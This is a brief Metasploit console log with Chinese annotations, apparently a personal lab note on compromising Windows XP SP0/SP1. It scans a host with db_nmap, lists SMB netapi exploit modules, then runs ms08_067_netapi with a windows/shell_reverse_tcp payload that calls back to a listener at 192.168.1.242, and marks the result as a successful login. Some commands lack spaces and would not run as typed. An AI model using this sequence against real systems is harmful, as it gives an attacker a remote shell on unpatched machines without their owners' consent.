***(適用於windows xp sp0 sp1,只看思路) 類似 armitage

root@kali:~# msfconsole

msf > workspace

msf > db_status

msf > workspace -a testlab

msf > db_nmap -T4 -A 192.168.1.78

msf > hosts

msf > services

msf exploit(ms06_040_netapi) > searchnetapi

 

Matching Modules

================

 

  Name                                Disclosure Date  Rank    Description

  ----                                ---------------  ----    -----------

  exploit/windows/smb/ms03_049_netapi 2003-11-11       good    MS03-049 Microsoft Workstation ServiceNetAddAlternateComputerName Overflow

  exploit/windows/smb/ms06_040_netapi 2006-08-08       good    MS06-040 Microsoft Server Service NetpwPathCanonicalizeOverflow

  exploit/windows/smb/ms06_070_wkssvc 2006-11-14       manual  MS06-070 Microsoft Workstation ServiceNetpManageIPCConnect Overflow

  exploit/windows/smb/ms08_067_netapi 2008-10-28       great   MS08-067 Microsoft Server Service RelativePath Stack Corruption

 

msf > useexploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > showpayloads

msf exploit(ms08_067_netapi) > setpayload windows/shell_reverse_tcp

payload => windows/shell_reverse_tcp

msf exploit(ms08_067_netapi) > showoptions

msf exploit(ms08_067_netapi) > set rhost192.168.1.78

rhost => 192.168.1.78

msf exploit(ms08_067_netapi) > set lhost192.168.1.242

lhost => 192.168.1.242

msf exploit(ms08_067_netapi) > showoptions

msf exploit(ms08_067_netapi) > exploit                              (成功登陸)